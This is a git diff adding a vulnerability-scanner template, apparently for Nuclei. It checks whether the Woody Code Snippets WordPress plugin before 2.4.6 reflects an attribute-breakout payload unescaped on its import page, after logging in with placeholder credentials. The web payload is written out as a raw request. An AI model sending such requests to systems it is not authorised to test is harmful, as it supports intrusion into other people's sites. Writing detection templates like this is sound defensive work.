diff --git a/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/vulnerabilities/wordpress/wp-insert-php-xss.yaml new file mode 100644 index 0000000000..afe2b16ec3 --- /dev/null +++ b/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -0,0 +1,46 @@ +id: wp-insert-php-xss + +info: + name: Woody Code Snippets < 2.4.6 - Reflected Cross-Site Scripting + author: Akincibor,DhiyaneshDk + severity: medium + description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3 + metadata: + verified: true + tags: wp-plugin,xss,wp,wordpress,authenticated,woody + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'import-wbcr_insert_php&a\">"' + - 'Woody Code Snippets Import' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200